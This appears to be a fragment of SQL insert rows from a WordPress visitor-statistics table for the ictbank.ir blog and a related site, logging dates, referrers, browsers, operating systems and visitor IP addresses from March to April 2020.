(1488,'2020-03-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.219.54.2','000',0,1,0),
(1489,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.131','000',0,1,0),
(1490,'2020-03-26','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','159.89.115.29','000',0,2,0),
(1491,'2020-03-26','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','138.197.155.4','000',0,1,0),
(1492,'2020-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.156.112.154','000',0,1,0),
(1493,'2020-03-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.158.31.240','000',0,1,0),
(1494,'2020-03-26','http://www.ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','195.154.181.60','000',0,3,0),
(1495,'2020-03-26','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','83.31.39.7','000',0,1,0),
(1496,'2020-03-26','http://ictbank.ir/blog','Safari','Windows','10.0',NULL,NULL,'','83.31.39.10','000',0,5,0),
(1497,'2020-03-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.220','000',0,1,0),
(1498,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','37.59.67.44','000',0,1,0),
(1499,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.39.7.93','000',0,1,0),
(1500,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','188.165.118.140','000',0,1,0),
(1501,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','46.105.245.164','000',0,1,0),
(1502,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.168.30','000',0,1,0),
(1503,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.191.220','000',0,1,0),
(1504,'2020-03-26','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','70.42.131.189','000',0,1,0),
(1505,'2020-03-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.222.33.218','000',0,1,0),
(1506,'2020-03-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.239.180.53','000',0,1,0),
(1507,'2020-03-26','http://ictbank.ir/blog','Android Browser','Android','2.3.6',NULL,NULL,'','80.77.61.214','000',0,1,0),
(1508,'2020-03-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','121.201.34.11','000',0,1,0),
(1509,'2020-03-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.57.40.38','000',0,3,0),
(1510,'2020-03-27','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','167.99.97.137','000',0,1,0),
(1511,'2020-03-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(1512,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','46.105.172.10','000',0,1,0),
(1513,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.9.54','000',0,1,0),
(1514,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.8.163','000',0,1,0),
(1515,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.183.92','000',0,1,0),
(1516,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.121.167','000',0,1,0),
(1517,'2020-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.108.124','000',0,1,0),
(1518,'2020-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.148.96','000',0,1,0),
(1519,'2020-03-27','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','103.82.235.2','000',0,1,0),
(1520,'2020-03-27','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','68.183.104.51','000',0,1,0),
(1521,'2020-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.136.123','000',0,1,0),
(1522,'2020-03-27','http://www.ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','195.154.181.60','000',0,3,0),
(1523,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.39.54.233','000',0,1,0),
(1524,'2020-03-27','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','207.102.138.158','000',0,2,0),
(1525,'2020-03-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.130.74','000',0,1,0),
(1526,'2020-03-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,4,0),
(1527,'2020-03-27','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,6,0),
(1528,'2020-03-27','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.121.76.25','000',0,1,0),
(1529,'2020-03-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1530,'2020-03-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.158.190.214','000',0,1,0),
(1531,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.218.8','000',0,1,0),
(1532,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.247.249','000',0,1,0),
(1533,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.120.235','000',0,1,0),
(1534,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.191.212','000',0,1,0),
(1535,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','37.59.253.52','000',0,1,0),
(1536,'2020-03-27','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','176.31.59.231','000',0,1,0),
(1537,'2020-03-28','http://www.design-arena.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','195.154.181.60','000',0,3,0),
(1538,'2020-03-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,2,0),
(1539,'2020-03-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.20.239','000',0,1,0),
(1540,'2020-03-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,1,0),
(1541,'2020-03-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.206.189','000',0,1,0),
(1542,'2020-03-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(1543,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.168.220','000',0,1,0),
(1544,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.187.88','000',0,1,0),
(1545,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.168.113','000',0,1,0),
(1546,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.32.159.111','000',0,1,0),
(1547,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.183.59','000',0,1,0),
(1548,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.66.118','000',0,1,0),
(1549,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','37.59.71.229','000',0,1,0),
(1550,'2020-03-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,3,0),
(1551,'2020-03-28','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,3,0),
(1552,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','70.49.97.160','000',0,1,0),
(1553,'2020-03-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.223.204.167','000',0,1,0),
(1554,'2020-03-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.20.241','000',0,1,0),
(1555,'2020-03-28','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','90.154.102.15','000',0,1,0),
(1556,'2020-03-28','http://ictbank.ir/blog','Safari','OS X','10.15',NULL,NULL,'','70.226.16.229','000',0,1,0),
(1557,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','176.31.26.57','000',0,1,0),
(1558,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.222.11','000',0,1,0),
(1559,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.32.159.110','000',0,1,0),
(1560,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.168.20','000',0,1,0),
(1561,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.169.245','000',0,1,0),
(1562,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.30.211','000',0,1,0),
(1563,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.181.178','000',0,1,0),
(1564,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.186.179','000',0,1,0),
(1565,'2020-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.120.248','000',0,1,0),
(1566,'2020-03-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','167.114.181.145','000',0,5,0),
(1567,'2020-03-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.66.114.103','000',0,1,0),
(1568,'2020-03-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(1569,'2020-03-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(1570,'2020-03-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,2,0),
(1571,'2020-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.25.214','000',0,1,0),
(1572,'2020-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.17.196','000',0,1,0),
(1573,'2020-03-29','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.177.113','000',0,1,0),
(1574,'2020-03-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.239.180.113','000',0,1,0),
(1575,'2020-03-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.239.180.128','000',0,1,0),
(1576,'2020-03-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.226.211.143','000',0,1,0),
(1577,'2020-03-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.239.180.140','000',0,1,0),
(1578,'2020-03-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.226.211.12','000',0,1,0),
(1579,'2020-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.192.44','000',0,1,0),
(1580,'2020-03-29','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.68.152.26','000',0,1,0),
(1581,'2020-03-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','207.102.138.158','000',0,3,0),
(1582,'2020-03-29','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,1,0),
(1583,'2020-03-29','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','62.67.212.40','000',0,1,0),
(1584,'2020-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.122.146','000',0,1,0),
(1585,'2020-03-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.121.76.25','000',0,1,0),
(1586,'2020-03-29','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','176.31.26.59','000',0,1,0),
(1587,'2020-03-29','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','188.165.118.103','000',0,1,0),
(1588,'2020-03-29','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.66.170','000',0,1,0),
(1589,'2020-03-29','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.39.26.159','000',0,1,0),
(1590,'2020-03-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.42','000',0,1,0),
(1591,'2020-03-29','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','182.61.137.133','000',0,3,0),
(1592,'2020-03-30','http://www.ictbank.ir/blog','Vivaldi','Windows','6.1',NULL,NULL,'','209.99.132.147','000',0,2,0),
(1593,'2020-03-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,2,0),
(1594,'2020-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.113.240','000',0,1,0),
(1595,'2020-03-30','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,1,0),
(1596,'2020-03-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(1597,'2020-03-30','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.187.82','000',0,1,0),
(1598,'2020-03-30','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.169.235','000',0,1,0),
(1599,'2020-03-30','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.30.192','000',0,1,0),
(1600,'2020-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.31.181','000',0,1,0),
(1601,'2020-03-30','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','119.23.131.91','000',0,1,0),
(1602,'2020-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,1,0),
(1603,'2020-03-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1604,'2020-03-30','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,5,0),
(1605,'2020-03-30','http://ictbank.ir/blog','Samsung Internet','Android','10',NULL,NULL,'','172.27.248.3','000',0,1,0),
(1606,'2020-03-31','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,2,0),
(1607,'2020-03-31','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','178.35.233.228','000',0,1,0),
(1608,'2020-03-31','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','47.96.72.19','000',0,1,0),
(1609,'2020-03-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,1,0),
(1610,'2020-03-31','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.155.30.101','000',0,1,0),
(1611,'2020-03-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.220','000',0,1,0),
(1612,'2020-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.73.3','000',0,1,0),
(1613,'2020-03-31','http://ictbank.ir/blog','Samsung Internet','Android','10',NULL,NULL,'','172.27.248.3','000',0,1,0),
(1614,'2020-03-31','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1615,'2020-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.212.219','000',0,1,0),
(1616,'2020-03-31','http://ictbank.ir/blog/','Edge','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,16,0),
(1617,'2020-03-31','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','188.143.169.29','000',0,2,0),
(1618,'2020-03-31','http://design-arena.ir/blog','Chrome','Android','8.0.0',NULL,NULL,'','51.15.61.228','000',0,1,0),
(1619,'2020-03-31','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','158.140.186.14','000',0,1,0),
(1620,'2020-03-31','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.174.40.8','000',0,3,0),
(1621,'2020-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.99.233','000',0,1,0),
(1622,'2020-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.238.96','000',0,1,0),
(1623,'2020-03-31','http://ictbank.ir/blog','Samsung Internet','Android','10',NULL,NULL,'','172.27.248.40','000',0,2,0),
(1624,'2020-03-31','https://l.instagram.com/','Instagram','Android','10',NULL,NULL,'','5.208.181.50','000',0,3,0),
(1625,'2020-03-31','http://ictbank.ir/blog','Chrome','Android','8.0.0',NULL,NULL,'','5.115.154.187','000',0,1,0),
(1626,'2020-03-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.185.239.92','000',0,1,0),
(1627,'2020-03-31','http://ictbank.ir/blog','Safari','iOS','13.4',NULL,NULL,'','8.20.126.119','000',0,1,0),
(1628,'2020-03-31','http://ictbank.ir/blog','Instagram','iOS','13.4',NULL,NULL,'','5.52.10.95','000',0,3,0),
(1629,'2020-04-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,4,0),
(1630,'2020-04-01','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,9,0),
(1631,'2020-04-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(1632,'2020-04-01','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.177.115','000',0,1,0),
(1633,'2020-04-01','https://l.instagram.com/','Instagram','Android','10',NULL,NULL,'','188.229.68.143','000',0,3,0),
(1634,'2020-04-01','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','95.54.213.36','000',0,1,0),
(1635,'2020-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.114.212','000',0,1,0),
(1636,'2020-04-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.174.40.8','000',0,1,0),
(1637,'2020-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.30.99','000',0,1,0),
(1638,'2020-04-01','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','40.85.176.239','000',0,3,0),
(1639,'2020-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.111.220','000',0,1,0),
(1640,'2020-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.171.223','000',0,1,0),
(1641,'2020-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.53.78.136','000',0,1,0),
(1642,'2020-04-01','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','122.224.131.186','000',0,3,0),
(1643,'2020-04-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1644,'2020-04-01','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','137.74.117.179','000',0,1,0),
(1645,'2020-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.116.120','000',0,1,0),
(1646,'2020-04-01','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','61.144.244.75','000',0,3,0),
(1647,'2020-04-01','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','80.82.115.2','000',0,1,0),
(1648,'2020-04-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','116.202.155.165','000',0,1,0),
(1649,'2020-04-01','http://ictbank.ir/blog','Safari','iOS','11.4.1',NULL,NULL,'','184.73.140.53','000',0,7,0),
(1650,'2020-04-01','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','18.206.213.51','000',0,7,0),
(1651,'2020-04-01','http://ictbank.ir:80','Chrome','Windows','6.1',NULL,NULL,'','116.203.128.166','000',0,1,0),
(1652,'2020-04-01','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','195.201.95.97','000',0,1,0),
(1653,'2020-04-01','http://ictbank.ir/blog','Unknown','Windows','6.2',NULL,NULL,'','173.249.26.11','000',0,1,0),
(1654,'2020-04-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(1655,'2020-04-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,1,0),
(1656,'2020-04-02','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.121.76.25','000',0,1,0),
(1657,'2020-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.66.246','000',0,1,0),
(1658,'2020-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.162.55.164','000',0,1,0),
(1659,'2020-04-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.230.208.147','000',0,1,0),
(1660,'2020-04-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.42','000',0,1,0),
(1661,'2020-04-02','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','181.214.14.192','000',0,1,0),
(1662,'2020-04-02','http://ictbank.ir/blog/wp-admin/customize.php?url=http%3A%2F%2Fictbank.ir%2Fblog%2F','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,13,0),
(1663,'2020-04-02','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','174.140.228.147','000',0,1,0),
(1664,'2020-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.63.28','000',0,1,0),
(1665,'2020-04-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','163.172.204.151','000',0,1,0),
(1666,'2020-04-02','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','104.168.164.128','000',0,3,0),
(1667,'2020-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.43.35','000',0,1,0),
(1668,'2020-04-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(1669,'2020-04-02','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(1670,'2020-04-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.106.30.99','000',0,3,0),
(1671,'2020-04-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.129.105','000',0,1,0),
(1672,'2020-04-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.27.249','000',0,1,0),
(1673,'2020-04-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(1674,'2020-04-03','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','217.182.69.216','000',0,1,0),
(1675,'2020-04-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.252.74','000',0,1,0),
(1676,'2020-04-03','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.117','000',0,1,0),
(1677,'2020-04-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.103','000',0,1,0),
(1678,'2020-04-03','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.118.223','000',0,1,0),
(1679,'2020-04-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.52.178.254','000',0,2,0),
(1680,'2020-04-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1681,'2020-04-03','http://ictbank.ir/blog/','Edge','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,10,0),
(1682,'2020-04-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.156.146.244','000',0,1,0),
(1683,'2020-04-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(1684,'2020-04-03','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','82.102.13.129','000',0,1,0),
(1685,'2020-04-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(1686,'2020-04-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.214.94.27','000',0,1,0),
(1687,'2020-04-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','158.140.186.16','000',0,1,0),
(1688,'2020-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.113.115','000',0,1,0),
(1689,'2020-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.236.178','000',0,1,0),
(1690,'2020-04-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,2,0),
(1691,'2020-04-04','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,2,0),
(1692,'2020-04-04','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','188.143.169.29','000',0,2,0),
(1693,'2020-04-04','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.54.31.92','000',0,3,0),
(1694,'2020-04-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','213.186.150.25','000',0,1,0),
(1695,'2020-04-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(1696,'2020-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.84.96','000',0,1,0),
(1697,'2020-04-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.106.30.99','000',0,2,0),
(1698,'2020-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.102.12','000',0,1,0),
(1699,'2020-04-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(1700,'2020-04-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1701,'2020-04-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(1702,'2020-04-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,1,0),
(1703,'2020-04-05','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,1,0),
(1704,'2020-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.137.160','000',0,1,0),
(1705,'2020-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.54.189','000',0,1,0),
(1706,'2020-04-05','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,3,0),
(1707,'2020-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.34.51','000',0,1,0),
(1708,'2020-04-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1709,'2020-04-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','194.36.188.199','000',0,1,0),
(1710,'2020-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.37.214','000',0,1,0),
(1711,'2020-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(1712,'2020-04-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(1713,'2020-04-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.62.46.5','000',0,1,0),
